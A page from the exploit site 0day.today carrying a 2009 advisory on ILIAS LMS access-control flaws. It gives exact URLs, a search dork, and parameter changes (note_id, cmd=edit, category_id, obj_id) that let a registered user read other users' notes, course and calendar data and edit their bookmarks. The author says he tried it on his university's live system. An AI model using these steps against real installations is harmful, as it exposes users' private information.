0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
ILIAS LMS <= 3.9.9/3.10.7 Arbitrary Edition/Info Disclosure Vulns
[================================================================= ILIAS LMS <= 3.9.9/3.10.7 Arbitrary Edition/Info Disclosure Vulns ================================================================= ---------------------------------------------------------------------------------------------- | MULTIPLE ARBITRARY INFORMATION DISCLOSURE AND EDITION | |--------------------------------------------------------------------------------------------| | | ILIAS LMS <= 3.10.7/3.9.9 | | | CMS INFORMATION: ----------------------------------- | | | |-->WEB: http://www.ilias.de/ | |-->DOWNLOAD: http://www.ilias.de/docu/goto.php?target=st_229_35&client_id=docu | |-->DEMO: http://www.demo.ilias-support.com/ | |-->CATEGORY: LMS/Education | |-->DESCRIPTION: ILIAS is a powerful web-based learning management system that allows you | | to easily manage learning resources in an integrated system. | |-->RELEASED: 2009-06-22 | | | | CMS VULNERABILITY: | | | |-->TESTED ON: firefox 3 | |-->DORK: "powered by ILIAS" | |-->CATEGORY: ARBITRARY INFORMATION EDITION/DISCLOSURE | |-->AFFECT VERSION: 3.10.7/3.9.9 | |-->Discovered Bug date: 2009-06-28 | |-->Reported Bug date: 2009-06-28 | |-->Fixed bug date: 2009-06-30 | |-->Info patch (3.10.8/3.9.10): http://www.ilias.de/docu/goto.php?target=st_229_35 | | &client_id=docu | |-->Author: YEnH4ckEr | |-->WEB/BLOG: N/A | |-->COMMENT: YEnH4ckEr <--<3--> Marijose. | | I'm going to rest for some time...J. Enrique y Pedro...wtf!?...algo sobre ILIAS!! ^_^ | ---------------------------------------------------------------------------------------------- <<<<---------++++++++++++++ Condition: registered user +++++++++++++++++--------->>>> I used my own account in my university...sorry for testing :P ################################# ///////////////////////////////// ARBITRARY INFORMATION DISCLOSURE ///////////////////////////////// ################################# ------------------- ------------------- "POST-ITS" ISSUE: ------------------- ------------------- When a user, teacher, admin, alumn, post a new post-its, he could read all post-its in database. The vuln link would be: http://[HOST]/[PATH]/ilias.php?col_side=right&block_type=pdnotes&rel_obj=0¬e_id=1¬e_type=1&cmd=showNote&cmdClass=ilpdnotesblockgui&cmdNode=50&baseClass=ilPersonalDesktopGUI Changing note_id=1 for other value, for ex. 100, we could read this posts-it. That seems a low risk vuln but, when i tested on-line, ie, against my university and i've got a lot of sensitive information. ------------------- ------------------- "CMD" ISSUE: ------------------- ------------------- Course/group/... calendars: This would be a normal link: http://[HOST]/[PATH]/repository.php?cmd=frameset&ref_id=50438 But if I change cmd=frameset for cmd=edit: http://[HOST]/[PATH]/repository.php?ref_id=50438&cmd=edit I access to information about this group/course/..., and I tried to change it, but i got permission denied...anyway, i can get how it's configured this group/course/... ------------------- ------------------- "CALENDAR" ISSUE: ------------------- ------------------- http://[HOST]/[PATH]/ilias.php?seed=2009-06-28&category_id=847&calendar_mode=2&cmd=edit&cmdClass=ilcalendarcategorygui&cmdNode=6&baseClass=ilPersonalDesktopGUI Changing category_id, it shows sensitive information about any course/group/... Personal and global calendars are secure. ######################################### ///////////////////////////////////////// ARBITRARY INFORMATION DISCLOSURE/EDITION ///////////////////////////////////////// ######################################### This module (favorite) allows to get a repository of favorite links ------------------- ------------------- "FAVORITE" ISSUE: ------------------- ------------------- This would be the vuln link: http://[HOST]/[PATH]/ilias.php?bmf_id=1&obj_id=926&cmd=editFormBookmark&cmdClass=ilbookmarkadministrationgui&cmdNode=2&baseClass=ilPersonalDesktopGUI GET var 'obj_id' is the vuln var...changing for other value you can view and edit any favorite link. User (victim) trusts in these links (He posts them) # 0day.today [2024-07-07] #